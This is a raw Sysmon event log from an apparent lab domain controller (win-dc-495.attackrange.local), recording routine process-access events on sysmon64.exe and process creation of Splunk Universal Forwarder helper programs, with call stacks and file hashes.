13:36:45.298{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.298{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:45.298{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.298{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:45.298{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.298{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:45.298{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.298{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EED-6005-E200-00000000A301}4108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.298{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EED-6005-E200-00000000A301}4108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.299{59A5CD1D-8EED-6005-E200-00000000A301}4108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:46.642{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EEE-6005-E400-00000000A301}880C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000004258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:46.642{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:46.642{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:46.642{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:46.642{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:46.642{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:46.642{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:46.642{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:46.642{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:46.642{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:46.642{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EEE-6005-E400-00000000A301}880C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:46.642{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EEE-6005-E400-00000000A301}880C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:46.643{59A5CD1D-8EEE-6005-E400-00000000A301}880C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe8.0.2Performance monitorsplunk ApplicationSplunk Inc.splunk-perfmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000004246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.888{59A5CD1D-8EEB-6005-DF00-00000000A301}3544win-dc-4950fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe 10341000x80000000000000004287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.986{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EEF-6005-E600-00000000A301}4312C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.986{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:47.986{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 